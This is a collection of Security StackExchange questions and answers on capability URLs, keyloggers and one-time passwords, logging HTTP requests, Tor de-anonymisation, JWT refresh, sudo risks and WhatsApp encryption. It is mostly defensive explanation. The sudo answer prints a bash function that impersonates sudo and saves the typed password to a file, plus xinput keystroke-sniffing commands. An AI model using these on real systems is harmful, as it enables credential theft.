Obviously, if your attacker has a camera and can take a picture without being noticed, it's an entirely different matter .
If the information you're securing can put your users at risk of this kind of attack, you should probably not use a capability URL. Or at least mitigate the issue by doing an HTTP redirect away from the capability URL, so it's only on screen for a few seconds. Regarding an attacker with elevated privileges on your computer (4), a capability URL is not less secure than a long password or even a client-side TLS certificate - as all of those are actually completely insecure, and there's not much you can do about that. An attacker with regular privileges (5), on the other hand, should not be able to learn the capability URL either, as long as you follow good security practices for your OS. Your files (particularly browser history) should not be readable by other users. If you share your computer account with other people, this is also horribly insecure. A good rule of thumb for shared computers is to not use them to access any information you'd not speak out loud in the street. For protecting API keys (6, which was the point of this question), a capability URL is also as secure as a less visible mechanism (such as an AJAX POST). Anyone who has a use for an API key will know how to use the browser debug mode to get the key. It's not reasonable to send someone a secret and expect them not to look at it! Some people have asked about the risks on the server side. It's not useful to treat server-side risks by threat modelling in this scenario. From a user perspective, you really have to treat the server as a trusted third party, as if your adversary has internal network access on the server side, there's really nothing you can do (very much like a privileged attacker on the client's computer, i.e. threat model 4 above). Instead of modelling attacks, I'll outline common risks of unintentional secret exposure. The most common concern with using capability URLs on the server side is that both HTTP servers and reverse proxies keep logs, and the URL is very often included. Another possibility is that the capability URLs could be generated in a predictable way - either because of a flawed implementation, an insecure PRNG, or giving insufficient entropy when seeding it. There are also many caveats that have to be taken into consideration when designing a site that uses capability URLs. In practice, for sites with dynamic content, it's quite hard to get everything done securely - both Google and Dropbox botched it in the past, as mentioned in this answer. Finally, capability URLs have a couple of advantages over other authentication methods: they are extremely easy to use (just click the link, as opposed to entering your email and password); they don't require the server / service to securely store sensitive user credentials; and they are easily shareable without risks, unlike sharing your password (which you reuse for 50 other sites). | {
"source": [
"https://security.stackexchange.com/questions/118975",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/32926/"
]
} |
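One way to avoid the "predictable capability URL" pitfalls mentioned in the answer above is to draw the token from the operating system's CSPRNG with an explicit entropy budget. The sketch below uses Python's secrets module; the 128-bit figure and the URL shape are illustrative assumptions, not a standard.

import secrets

def make_capability_url(base: str, entropy_bits: int = 128) -> str:
    token = secrets.token_urlsafe(entropy_bits // 8)   # OS CSPRNG, never random.random()
    return f"{base}/{token}"

print(make_capability_url("https://docs.example.com/d"))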
118,988 | I'm trying to improve security in a web application. The application has an admin site, and keyloggers are a concern that I'm trying to solve. Can the application do something to prevent keyloggers from working correctly? I've read about keystroke interference software (for each user keystroke it randomly adds more keystrokes without interfering with user input); can something like that be done in JavaScript? | Many applications make futile attempts to foil keyloggers and spyware by using convoluted (and cumbersome) password entry methods. None work against keyloggers and many actually cause users to be LESS secure because they make it hard to use password managers. The best way to handle that kind of thing is to use one-time passwords. There are several ways to go about it so let me suggest two: TOTP ( RFC 6238 ) works with many software authenticators (Google Authenticator, for instance) so it's both convenient, cheap to implement and free to use. It does require the user to set things up and have a smartphone, though. Another approach is to send a one-time password through SMS. This is a bit more expensive (because you have to send the message) but it's also easier for the user (who only needs a mobile phone and no setup). | {
"source": [
"https://security.stackexchange.com/questions/118988",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/106029/"
]
} |
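For reference, a compact sketch of the TOTP (RFC 6238) scheme suggested above, built on HOTP (RFC 4226) using only Python's standard library; the hard-coded Base32 secret is a throwaway demo value, and an authenticator app seeded with the same secret would show the same 6-digit code.

import base64, hashlib, hmac, struct, time

def hotp(secret_b32: str, counter: int, digits: int = 6) -> str:
    key = base64.b32decode(secret_b32, casefold=True)
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                                   # dynamic truncation
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % 10 ** digits
    return str(code).zfill(digits)

def totp(secret_b32: str, timestep: int = 30) -> str:
    return hotp(secret_b32, int(time.time()) // timestep)     # new code every 30 seconds

print(totp("JBSWY3DPEHPK3PXP"))   # demo secret; a keylogged code expires with its window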
119,004 | I'm currently looking at Secure Coding Practices documentation provided by Veracode with their code analysis toolsuite. In a "secure logging practices" section, they mention that logging full HTTP requests in case of error is a common mistake, but they don't explain why. I'm working on a personal website where I have 2 separate log files : errors.log : any unexpected exception ends up being caught and logged in that file. There, I simply log the stacktrace (classic simple basic exception logging) security.log : any request that could not be made via the UI, which is a sign of a forged request (example : IDOR attempts like someone trying to access data from another user), leads to a custom runtime security exception being thrown.
That Security Exception notably stores the http request that was made, and is then logged.
Basically, all my backend validators (that make the same checks as the front-end validators) throw this Security Exception when something goes wrong - the idea is that I (or a Cronned task ;) ) can regularly verify that security.log is empty. I decided to log the full http request (by that I mean : not the raw request, but I extract all the headers / cookies and parameters and display them in a readable manner, as well as info like timestamp, origin IP and such things) for the security exceptions only (to facilitate the analysis of potential biz-logic-related attacks). That log file will be opened in a text editor only (VI most probably), and will not be automatically parsed by tools or displayed in a webapp. Now, I understand that logging full http requests can be leveraged under some conditions. A classic example is a log-analysis webapp prone to XSS attacks that is used by a helpdesk - in this case an attacker could forge a malicious request to let the payload explode once the helpdesk guys check the content of the logs via the vulnerable webapp. I also understand that logging too much stuff can lead to Denial Of Service due to disks becoming full, but this is already the case with stacktraces. In my case, what dangers could arise from logging requests, in particular cases ?
The only (technically valid but unrealistic, given the low sensitivity of the website) thing I see would be a specially crafted payload that could cause some sort of buffer overflow when parsed by VI (the attacker would have to know that I use VI + use a 0-day etc.. Ok possible for NSA but unrealistic for this small site which is not a target of interest besides for some script kiddies). I guess someone could do some log forging but good luck finding out my unique request display :P Since I extract data in the request and display them in my own way, it's practically impossible to fool me via log forging. Should I specifically check for end-of-file VI control characters (does that even exist ?) ? What else could go wrong ? Am I missing something here ? Now I realize that my question could be paraphrased : "what can go wrong if I let users write text (via the request content..) to a single controlled file on my machine that will only be opened by a up-to-date well-proven text editor" UPDATE Update to provide more info in regards to the 3 first feedbacks (thanks for that great feedback btw !) The login form is not covered by the mechanism (but the registration form is !) I don't run a shop, there are no highly sensitive info. The most sensitive infos would be the first/lastname and birthdate during user registration. There is a game with points and rankings, so security is important to prevent cheating (therefore this custom logging) Insisting on the fact that only malicious-looking (front-end-validation bypassing) requests will be logged, in an utopian world the secure-log-file would stay empty forever Thanks to your feedback I realize the following, amongst other things : Disclosure of the content of this file could allow session hijacking due to session cookies being extracted from the request A bug in the request parser could make a request not get logged A bug in my code could log a malformed user-registration request which would store sensitive info in the secu-log (password clearly being the most sensitive) Handling : Regarding disclosure of the content of the file, I assume that if someone gets there, I'm pwned already :) Regarding the bug in the parser, indeed, but at least it would trigger an exception which would be logged in the "normal" logger, this is acceptable Regarding the registration form, I consider that even if such a rare bug would occur I should not have access to a plaintext password, even by accident. I'll adapt the parser not to store any request parameter that matches a *password* pattern. I guess that I can't realistically go further than that to protect my users (if I want to be able to detect biz-logic attacks live). I suppose that 99% of sites on the web don't go half as far as those considerations :) ). It seems clear to me that the small added attack surface is outweighed by the security benefits that this custom logging provides. I'll add additional thorough unit tests to that part of the codebase to ultimately reduce the risks of a bug. In a corporate environment I would guess twice regarding the logging of sensitive data - I guess I would discuss the matter with someone like a Data Compliance Officer | The key word is properly . Properly logging HTTP requests when there is a need for it is not bad practice. I am a pen tester and I log all the HTTP requests that I make as part of a test; doing so is expected. I also work on a server system that integrates with a number of complex legacy systems. Logging full HTTP requests on error is a necessary feature. 
It can show details like which system in a cluster made the erroneous request, which would otherwise be lost. Veracode is an automated source code analysis system. It can tell if you're passing an HTTP request to a log function. But it cannot really tell if you are logging "properly". So they have come up with this rather vague finding, because that's the best their system can do. Don't put too much weight on it. Does the issue have a risk rating? I suspect it would be low risk. Most people are less thorough than you and pay little attention to low-risk issues. The key parts to logging properly are: log injection / forging, denial of service, and confidentiality of logs. You mention the first two in your question. For a personal website, the third one is a non-issue - you're the owner, sys-admin, everything - and only you will have access. This is a much bigger issue in a corporate environment, where you certainly don't want to let everyone in the company have access to the confidential data (like user passwords) in the requests. Some systems deliberately mask parts of data in logs - especially credit card numbers, for PCI compliance. You mention you extract headers, cookies and parameters and format them in the log file. I recommend you log the raw requests, and have a separate post-processor to format them. There will be odd situations - e.g. a parameter duplicated in the URL and POST body - that may cause errors. Extracting and formatting can cause features of the original request to be lost. | {
"source": [
"https://security.stackexchange.com/questions/119004",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/68225/"
]
} |
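A small sketch of the two mitigations discussed in the entry above: mask any parameter whose name looks password-like, and neutralise control characters so a crafted request cannot forge extra log lines. The regular expressions and output format are illustrative, not a complete solution.

import re

SENSITIVE = re.compile(r"pass(word|wd)?|secret|token", re.IGNORECASE)

def sanitize(value: str) -> str:
    # Strip CR/LF and other control characters that enable log forging.
    return re.sub(r"[\x00-\x1f\x7f]", " ", value)

def format_params(params: dict) -> str:
    parts = []
    for name, value in params.items():
        shown = "********" if SENSITIVE.search(name) else sanitize(value)
        parts.append(f"{sanitize(name)}={shown}")
    return "&".join(parts)

print(format_params({"username": "alice\r\nFAKE LOG LINE", "newPassword": "hunter2"}))
# username=alice  FAKE LOG LINE&newPassword=********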
119,146 | I read in this article that the FBI was able to crack the anonymity of Tor. From what I heard and read, onion routing makes it almost impossible to de-anonymize a user. The last time I heard of anyone trying to crack Tor it was the NSA, and it did not succeed, or at least they did not publicly advertise it (that article is 2 to 3 years old now and may not be that relevant anymore). Does anyone have any insights on how the FBI might have done it? | The article you link says that the FBI obtained "the MAC address" for the user computers. MAC addresses are specific to each piece of Ethernet hardware, and they don't travel beyond the first hop -- meaning that they are visible to your home router, possibly the one provided by the ISP, but not beyond. If that specific piece of information is true, then this means that the FBI really deployed a piece of malware on the site, and the users simply got it on their computer. After all, the FBI first seized the offending site and ran it, at which point they had full control over its contents. People using Tor to access a child pornography site are not necessarily smarter than average people, and they would intrinsically "trust" that site, making malware deployment possible, even easy. Tor anonymity relies on the idea that potential attackers (the FBI in that case) cannot control sufficiently many nodes to make correlations possible. However, that "sufficiently many" is not that big a number; if one of your connections, even temporarily, goes through an "entry node" controlled by the attacker, and the same attacker can see what happens on the exit (and he can, if he actually hosts the target site), then correlation is relatively easy (through both timing of requests and size of packets, because encryption does not hide size). With control of the target site, it would even be possible to change the size of individual response packets to help correlation. However, Tor does nothing against hostile code sent to the user and executed by the user, and if the MAC address was recovered then such code was involved. | {
"source": [
"https://security.stackexchange.com/questions/119146",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/94175/"
]
} |
119,343 | I own a chat room and some users use a program called Winsock Packet Editor, "WPE PRO". With it they manage to bypass chat rules: they can't be muted or kicked, and they can send messages quickly, bypassing the chat's rate limit. I was wondering if there is a way to end this? About the software, from the developer website: Winsock Packet Editor (WPE) Pro is a packet sniffing/editing tool which is generally used to hack multiplayer games. WPE Pro allows modification of data at TCP level. Using WPE Pro one can select a running process from the memory and modify the data sent by it before it reaches the destination. It can record packets from specific processes, then analyze the information. You can set up filters to modify the packets or even send them whenever you want, at different intervals. WPE Pro could also be a useful tool for testing thick client applications or web applications which use applets to establish socket connections on non-HTTP ports. Update: It's called 123flashchat, it's Java/Flash, and unfortunately the company abandoned the project, so there are no updates or fixes any more. Also, the issue is not kicking the user: there is a ban on the IP, but a user can change their IP, return, and start spamming messages quickly again. | If what you describe is true, your chat room is designed badly. The server's view, and which of the packets it receives get forwarded to other users, should be independent of whatever packets any single client sends. Manipulating the traffic on a client should only interfere with that client's view of the chat room, never with other clients. If you designed that differently, you are trusting the clients to behave correctly. You should never do that. Misbehaving clients (those not behaving according to your rules) may create even bigger problems for you than people not being kicked. Here are a few examples of things that may happen without proper input validation: users may impersonate other users, leading to massive trust and confidentiality breaches, and users may gain rights they otherwise wouldn't have, potentially being able to hold your service for ransom. Side note here: there are many web clients for IRC that are easy to deploy and many IRC networks that let you host channels for free. Have your pick and rely on a proven platform for chats. | {
"source": [
"https://security.stackexchange.com/questions/119343",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/106347/"
]
} |
119,371 | If I understand best practices, a JWT usually has an expiration date that is short-lived (~15 minutes). So if I don't want my user to log in every 15 minutes, I should refresh my token every 15 minutes. I need to maintain a valid session for 7 days (from a UX point of view), so I have two solutions: use a long-lived JSON web token (1 week) - bad practice? - or get a new JSON web token after the old one expires (JWT 15 min, refresh allowed during 1 week). I'm forcing the use of HTTPS. The JWT standard doesn't speak about refreshing tokens. Is refreshing an expired token a good strategy? | Refreshing a token is done to confirm with the authentication service that the holder of the token still has access rights. This is needed because validation of the token happens via cryptographic means, without the need to contact the authentication service. This makes the evaluation of the tokens more efficient, but makes it impossible to retract access rights for the life of a token. Without frequent refreshing, it is very difficult to remove access rights once they've been granted to a token. If you make the lifetime of a token a week, you will likely need to implement another means to handle, for example, the deletion of a user account, the changing of a password (or other event requiring relogin), and a change in access permissions for the user. So stick with the frequent refresh intervals. Once every 15 minutes shouldn't be enough to hurt your authentication service's performance. Edit 18 November 2019: Per @Rishabh Poddar 's comment, you should generate a new refresh token every time the old one is used. See this in-depth discussion of session management for details. | {
"source": [
"https://security.stackexchange.com/questions/119371",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/26203/"
]
} |
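A rough sketch of the short-lived-JWT-plus-rotating-refresh-token pattern described in the answer above, assuming the PyJWT package; the in-memory store, the signing key and the 15-minute lifetime are placeholders for a real database and policy.

import datetime
import secrets
import jwt   # PyJWT

SECRET = "server-side-signing-key"   # placeholder
refresh_store = {}                   # refresh token -> user id (a real DB in practice)

def issue_tokens(user_id: str):
    access = jwt.encode(
        {"sub": user_id,
         "exp": datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(minutes=15)},
        SECRET, algorithm="HS256")
    refresh = secrets.token_urlsafe(32)
    refresh_store[refresh] = user_id
    return access, refresh

def refresh_tokens(old_refresh: str):
    user_id = refresh_store.pop(old_refresh, None)   # rotate: the old token is now invalid
    if user_id is None:
        raise PermissionError("unknown or already-used refresh token")
    return issue_tokens(user_id)

access, refresh = issue_tokens("alice")
print(jwt.decode(access, SECRET, algorithms=["HS256"])["sub"])   # "alice"
access, refresh = refresh_tokens(refresh)   # called roughly every 15 minutes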
119,410 | Most modern Linux articles advise using sudo rather than logging into root. This advice is so ingrained that some distros don't automatically allow root login. Indeed, they come pre-configured with sudo using the user's password to run arbitrary commands as root. What can go wrong? In reality, if one runs the above command, one might almost as well be running as root!! What does malware do? It modifies .bashrc to include export PATH=/home/user/.hack:$PATH and drops a script to ~/.hack which will: imitate sudo, send the password to a C&C server, and delete itself. The hacker gets the (user and root) password. The same concern exists with plain su, and the only ways to avoid it are: (1) Alt-Ctrl-F1 and log in as root, or (2) always run sudo or su as /usr/bin/sudo or /usr/bin/su. The first option seems much more secure, yet seems to go against modern practice. Why? | There are valid convenience uses for sudo, but because they are already adequately explained in other posts, I won't elaborate on them much here. I will however point you to sudoers(5) , which is the sudo configuration file. It shows some of the extensive configuration possible with sudo. I will be explaining when and why you should not use sudo to elevate from your normal user to root for purely security reasons, convenience aside. Short answer: There is no way to securely use sudo if your regular user may be compromised. Use it only for convenience, not for security. The same applies to su and all other programs that may be used to elevate your regular user to a more privileged one. Long answer: It is not true that using the full path for sudo will protect you from a malicious environment. That is a common misunderstanding. A bash function can even hijack names that contain a / at the beginning (example based on this article ): $ type /usr/bin/sudo
/usr/bin/sudo is a function
/usr/bin/sudo ()
{
local pass;
if [[ -z "${@}" ]]; then
//usr/bin/sudo;
else
read -srp "[sudo] password for ${USER}: " pass;
echo "${pass}" > /tmp/.password;
echo -e "\nSorry, try again.";
//usr/bin/sudo ${@};
fi
}
$ /usr/bin/sudo id
[sudo] password for joe:
Sorry, try again.
[sudo] password for joe:
uid=0(root) gid=0(root) groups=0(root)
$ cat /tmp/.password
hunter2 You must only use option 1, aka logging in with agetty or logind on a different tty (note that on some distros, tty1 is where Xorg is running, such as Fedora. On most distros however, tty1 is a spare tty and Xorg runs on tty7). However , you must be aware that malware can hijack ctrl + alt + f1 and present you with a fake screen, so you must use the Secure Attention Key combination (SAK, which is alt + sysrq + k on Linux systems), which kills all processes in that tty. This kills any fake login screen and brings you to the real one only. If there are no fake login screens trying to steal your root password (which is hopefully the case), then it simply causes agetty to restart, which should appear as nothing more than the login prompt blinking. On some systems, many SysRq features are disabled, including SAK. You can temporarily enable them all by writing the integer 1 to /proc/sys/kernel/sysrq . The value of /proc/sys/kernel/sysrq is a bitmask, so look into what it currently is and calculate what you need to convert it into to add SAK support before making it permanent in /etc/sysctl.conf . Setting it to 1 forever can be a bad idea (you don't want just anyone to be able to alt + sysrq + e to kill xscreensaver, do you?). The idea that you can protect your regular user and use sudo or su safely is a very dangerous idea. Even if it were possible, there are countless ways to hijack your running session, such as LD_PRELOAD , which is an environmental variable that points to a shared object (library) which will be forcibly loaded by the program to change its behavior. While it doesn't work on setuid programs like su and sudo, it does work on bash and all other shells, which execute su and sudo, and are the ones who see all your keystrokes. LD_PRELOAD isn't the only variable which can hijack programs running as your user. LD_LIBRARY_PATH can tell a program to use malicious libraries instead of your system libraries. There are many more environmental variables that can be used to change the behavior of running programs in various ways. Basically, if your environmental variables can be compromised, your user, and all keystrokes entered as that user, can be compromised. If that weren't enough, on most distros, your user can use ptrace() with the GETREGS or PEEKTEXT/PEEKDATA options to view all the memory of processes running as the same user (such as the bash process which is running su or sudo for you). If you are using a distro which disables that (e.g. by using the Yama LSM ), the process still may be able to read and write to your bash process' memory using process_vm_readv() and process_vm_writev() respectively. On some kernels, you can also write directly to memory through /proc/pid/mem , as long as the process writing to it is the same user. In the Linux kernel, there are countless security checks all over to make sure processes cannot interfere with each other. However, they all involve inter -user protection, not intra -user protection. The Linux kernel assumes that every single thing done as user A is trusted by user A, so if you su to root as user A, then root must be just as trusted as that user. Before I even get on to Xorg, let me just start out by saying Xorg provides no protection from keyloggers. This means that, if you use sudo or su in a tty with Xorg running, all processes running as that same user will be able to sniff (and inject) keystrokes. 
This is because the X11 protocol's security model assumes that anything with access to the X11 cookie is trusted, and that cookie is accessible to everything running under your user. It is a fundamental limitation of the X11 protocol, ingrained as deeply as the concept of UIDs are on Linux. There is no setting or feature to disable this. This means that anything you type in an Xorg session, including typed into su or sudo (or frontends like gksu, gksudo, kdesu, kdesudo, pinentry, etc) can be sniffed by anything running as the same user, so your browser, your games, your video player, and of course everything forked by your .bashrc. You can test this yourself by running the following in one terminal, and then moving to another terminal and running a command with sudo. $ xinput list
Virtual core pointer id=2 [master pointer (3)]
↳ Virtual core XTEST pointer id=4 [slave pointer (2)]
↳ ETPS/2 Elantech Touchpad id=13 [slave pointer (2)]
Virtual core keyboard id=3 [master keyboard (2)]
↳ Virtual core XTEST keyboard id=5 [slave keyboard (3)]
↳ Power Button id=8 [slave keyboard (3)]
↳ USB Camera id=10 [slave keyboard (3)]
↳ AT Translated Set 2 keyboard id=12 [slave keyboard (3)]
↳ Video Bus id=7 [slave keyboard (3)]
↳ Sleep Button id=9 [slave keyboard (3)]
↳ Asus WMI hotkeys id=11 [slave keyboard (3)]
↳ Power Button id=6 [slave keyboard (3)]
$ xinput test 12 # replace 12 with the id number of your keyboard
key press 45
key press 44
key release 40
key press 41
key release 45
key release 44
key release 41
key press 31
^C Note that if this specific test does not work for you, it means you do not have the XTEST extension active. Even without it active, it is still possible to record keyboard events using XQueryKeymap() . The lesson you should take way is that there is effectively no way to securely enter your password using su or sudo through a compromised user. You absolutely must switch to a new tty and use SAK, then log in directly as root (or a non-root user whose only purpose is to sudo to root). | {
"source": [
"https://security.stackexchange.com/questions/119410",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/106421/"
]
} |
119,510 | I see systems that use database prefixes. Some call it a security feature. Some call it a way to have multiple installations in one database. The main pro is that it's harder to guess the whole table name. On the other hand, if you have some kind of access to the database, I would say you could figure out the schema/table list. Is it a viable security feature? | This is security through obscurity . While it might not hurt you in all cases, on its own it does not provide viable security. Do not rely on this as your protection. A short parable Let's say you keep your money in a jar labeled MONEY in your house. Since you know you sometimes forget to lock the door when you leave the house, you relabel the jar COOKIES to prevent a thief from finding it. Would you feel more secure now? Sure, a very lazy, dumb thief might miss it, but you would not have to be a master thief to steal your money. Wouldn't it be better to just remember to lock the door instead? Back to the computer world Let's say you have an old phpBB installation with an SQL injection vulnerability. By default the tables are prefixed by phpbb_ . You change this to obscure_ . Will this help you? A naive scan might look only for hard-coded table names (like phpbb_users with all the passwords), and therefore fail. But even a script kiddie could run a script that runs SHOW TABLES and finds your obscure_users . In fact, there are tools that will automatically dump the contents of all your tables through a SQL injection vulnerability. Conclusion So what is the lesson here? While changing table prefixes (relabeling the jar) might perhaps protect you from the most basic dumb automated attack (the stupid, lazy thief), you would still be vulnerable to simple attacks performed by script kiddies (a thief searching through your jars). When you have a real vulnerability like SQL injection, the solution is to fix that vulnerability (lock the door), and not to add a thin veil of obscurity. That said, a simple precaution that might slow down some attacks might still be worthwhile as "defence in depth" if it has no harmful side effects. Just don't feel safe merely because you implement it. (As an addendum, I should say that running multiple installations in the same database might come with security implications of its own, depending on the situation.)
"source": [
"https://security.stackexchange.com/questions/119510",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/11949/"
]
} |
119,579 | From what I understand file extensions don't really affect the data contained within them at all. They just give your computer a hint of what the data is, how it's structured and your computer then finds the best program to deal with that specific file type. So my question is: if you could write custom data to, for instance, a .png file that actually contains different values than what a normal .png file is composed of, then have a program open it, could you get it to do something malicious? | File extensions The file extension actually has absolutely nothing to do with the data in the file or how that data is structured. Windows likes to make you think the extension is somehow magical - it's not, it's just part of the file name, and tells Windows which program to launch when you open the file. (Linux/Android and MacOS/iOS still use file extensions a bit, but not nearly to the same degree that Windows does.) You are completely correct that you can dump some data into a file, call it virus.png and it'll get opened by an image viewer. Call it virus.docx and it'll get opened by MS Word. Unexpected data If you take a well-written program and feed it file containing data that it's not expecting, nothing exciting should happen. The program should give an error about a "corrupted file" or something similar and move on with its life. The problem happens when the program is not well-written - usually due to some small bug like a programmer forgetting to check the bounds of an array, forgetting to check for null pointers, or forgetting to put braces { } on an if statement. Even if there is a bug, 99.999...% of malformed data will get the "corrupted file" error. Only if you construct the data very carefully can you get something malicious to happen. For a concrete example, see the section on StageFright below. (Thanks to @octern's comment for this). Malicious payloads in innocent-seeming files Yes, what you're describing is actually a common attack vector - hence the general fear of opening unknown email attachments. As an attacker, if you know that there's a vulnerability in a specific program, say the default Windows image viewer, then you can construct a malicious file designed to exploit this. Usually this means that you know that a certain line of code in the viewer does not check the bounds of an array, so you build a malformed .png specifically designed to do a buffer overflow attack and get the program to run code that your inserted. PNG exploits For example, here's a vulnerability report about the open source library libpng [CVE-2004-0597] . Multiple buffer overflows in libpng 1.2.5 and earlier, as used in multiple products, allow remote attackers to execute arbitrary code via malformed PNG images in which (1) the png_handle_tRNS function does not properly validate the length of transparency chunk (tRNS) data, or the (2) png_handle_sBIT or (3) png_handle_hIST functions do not perform sufficient bounds checking. Aside: a Common Vulnerabilities and Exposures (CVE) is a way to track known vulnerabilities in public software. The list of known vulnerabilities can be searched here: https://cve.mitre.org/cve/cve.html If you search the CVE's for "png" you will find hundreds of vulnerabilities and attacks just like the one you imagined in your question. 
Android StageFright The StageFright Android vulnerability of April 2015 was very similar: there was a buffer overflow vulnerability in Android's core multimedia library, and by sending a malformed audio/video file by MMS (multimedia message), an attacker could get complete control of the phone. The original exploit for this vulnerability was for an attacker to send a 3GPP audio/video file which looked like a valid audio/video file, except that one of the integer fields in the metadata was abnormally large, causing an integer overflow. If the large "integer" actually contained executable code, this could end up being run on the phone, which is why this kind of vulnerability is called an "arbitrary code execution vulnerability". PDF and MS Word exploits If you search the CVEs for "pdf" or "word" you'll find a whole pile of arbitrary code execution vulnerabilities that people have been able to exploit with those file types (wow - a number of very recent ones for Word too, neat). That's why .pdf and .docx are commonly used as email attachments that carry viruses. | {
"source": [
"https://security.stackexchange.com/questions/119579",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/88186/"
]
} |
119,624 | WhatsApp implemented end-to-end encryption ( whitepaper ) in their latest update. How is it possible for WhatsApp to send push notifications with message contents to the Apple Push Notification service? One possible solution would be to send the unencrypted message to APNs from within the app itself but this would be open to abuse and would defeat the purpose of end-to-end encryption. Update: I have just tested it a bit more, according to Apple's documentation: However, the system does not automatically launch your app if the user has force-quit it. In that situation, the user must relaunch your app or restart the device before the system attempts to launch your app automatically again. Which I tested, and resulted in me still receiving the plain text push notifications. This would lead me to believe the app is not running in the background to decrypt any notifications received and then repost them. Update May-2017: I have now used the VoIP API ( as mentioned in the answers below ) to effectively achieve the same result myself in a demo app. Works very well. Update July-2017: Apple no longer allows the usage of the API for push notifications of non-VOIP apps. They do however allow WhatsApp to do it in their infinite fairness. Update September 2018: A notification application extension can now be used to decrypt push notifications. However, dynamic libraries are discouraged from use in such extensions so you must have a codebase that can be compiled statically for decryption etc. | WhatsApp could be using VOIP background mode along with PushKit for solving this problem. Voip pushes are: delivered directly to the app. considered high-priority notifications and are delivered without delay. delivered even if the app was force-quit by the user. For details refer to Voice Over IP (VoIP) Best Practices Once the encrypted payload of VOIP push is decrypted they show a “Local Notification” with the decrypted message. There is one small issue though, PushKit is available only on iOS 8 and later. So, how is Whatsapp doing it for earlier versions of iOS?
Well, it isn’t. They don’t allow you to see message previews in notifications on versions earlier than iOS 8 (verified on iOS 7, see screenshot) | {
"source": [
"https://security.stackexchange.com/questions/119624",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/106644/"
]
} |
119,635 | (I am not sure if this question fits the security.stackexchange-board, but the list of askable topics does not exclude this question imho and there are some examples ) I've worked for several different companies of which some had outsourced their IT-department. This means that the people at the company mostly use technology, but have no deeper understanding of it, especially when it comes to security. Therefore I was toying with the idea to offer 1 or 2 small workshops / trainings, so they can get at least an idea of WHY computer security is important and WHAT exactly is important. I would like to do this because I think human knowledge should be shared, no matter the recipient, and both sides might learn. My colleagues might understand security better and I might understand their point of view better. So I sat down and tried to come up with a list of necessary and useful topics, keeping the target audience in mind. Am I missing topics, should there be other topics? What is necessary to learn, when you deal with computer security? Topics: Why computer security? (Costs, Ransomware stopping a complete company, ...) Passwords (What is a good password, how to store, never use same PW on different accounts, ...) Lock the screen when leaving the workplace (Because...? Did not find good examples of what could happen, also is this a high priority?) Should I show a hacking example to visualize what it is? For example older phones / tablets are crackable pretty fast with open source software. Social Engineering (2 colleagues got a call and became victims of the CLSID-Scam , door gliding, USB sticks in the parking lot, ...) Internet security (NoScript, deactivate Flash / JS, what's phishing, ...) Backups Email encryption Protective measures (keep OS updated, use antivirus software, don't use the admin account as a default, ...) I don't know which topics should be mandatory and in which order. The training might take 1 or even 2 hours. I would also create some cheat-sheets, so they can take away some written information, further reading etc. | I actually did a presentation similar to this a little over a year ago, and spent quite a bit of time deciding how to structure it. My target audience did include developers and other people quite knowledgeable in IT, but also managers and other non-programmers, so I tried to keep it fairly general, and not too technically complicated. As someone else pointed out, I think one important thing is not to come across as boring; you want this to be an enlightening talk that helps people realize that this is something they ought to keep in mind, and not just another list of dreary tasks that will get in the way of actual work . To this end, I tried to center the whole presentation around the concept of security culture instead of jumping straight into too many technical details. With that in mind, I still managed to touch upon many of the themes you mention in your question. Some of the stuff I mentioned in my talk (or would touch upon today if I was to hold another similar talk): Confidentiality, Integrity and Availability (CIA): The central themes of information security, and a few should-be-obvious words about why these are important both to your company, and to individuals (if you can give people a little guidance that will help them stay safer beyond the workplace too, then that is only a plus, right? It might also make some pay more attention to you too - especially if you touch upon the safety of their kids/family too).
A few words about the concept of "security culture" ("culture" as in " a set of ideas, habits and social norms, common to a specific group of people ", or something like that, and the idea that security awareness should be a conscious part of this ). Goals of thinking about security: Reducing the risk of unwanted incidents, preparing to handle them if / when they occur anyway. Keeping cost in mind (or return on investment if you like); thinking about what measures will be easiest to get started with, and which make the most sense. I would include a few words about good habits here; such things as update your systems, use good passwords, and avoid clicking suspicious links, be conscious of physical security (tailgaters!) etc. Perhaps include a few examples from real-world events, including screen shots of news articles about breaches, etc? Throw out a few questions related to what type of vulnerabilities or threats might be relevant to your particular company, and more. Examples: What are the "crown jewels" of our business? What is most important to us, and what may threaten them? How secure are we today, how secure would we like to be, and how can we get there in the future? In what areas would we want to improve our security stance? The point here is not to give people a checklist of things to do, but to get them thinking about the whole realm of security in general, and help take responsibility for parts of it, themselves. Give a few examples of typical security guidelines, and ask your audience if any of them (or similar) should be considered for your workplace. Oh, and one more thing: Including a few appropriate real world examples of security problems will help keep your audience entertained (but don't overdo it). I don't know if this is exactly what you were after, but I hope it may be of some use. Good luck with your presentation. | {
"source": [
"https://security.stackexchange.com/questions/119635",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/99028/"
]
} |
119,636 | Today I woke up and checked my Whatsapp and got the message that communications are encrypted end-to-end from now on. However, how can I know whether Whatsapp can be trusted? I did not generate my private/public keys , nor can I change them. Isn't this always a security flaw? Could it be that the private keys were intercepted as they were being sent to users? Could it be that Whatsapp kept the private keys, just in case the FBI gets really mad about not being able to access some account and demand cooperation? | "I did not generate my private/public keys" You didn't, but your device did. "nor can I change them" I wouldn't be surprised if they add that ability in future (as it'd just be a case of being allowed to authenticate with your existing key and then request that it be replaced: providing only a new public key at that point) Could it be that the private keys were intercepted as they were being sent to users?" The keys are generated client-side, or so they say... "Could it be that Whatsapp kept the private keys, just in case the FBI gets really mad about not being able to access some account and demand cooperation?" We'll see.... Their paper gives a decent description of what's going on and includes a link to the (open source) protocol library that they use. However, as with any system, you ultimately have to trust that they're on your side and not the bad guy's (whoever that may be) because if they control the code and the updates to it, then they still have the power to release modifications targeting specific users etc if required... However, much like the Apple vs FBI case , it's really not in the tech companies' best interest to be seen to give in to such demands. | {
"source": [
"https://security.stackexchange.com/questions/119636",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/29727/"
]
} |
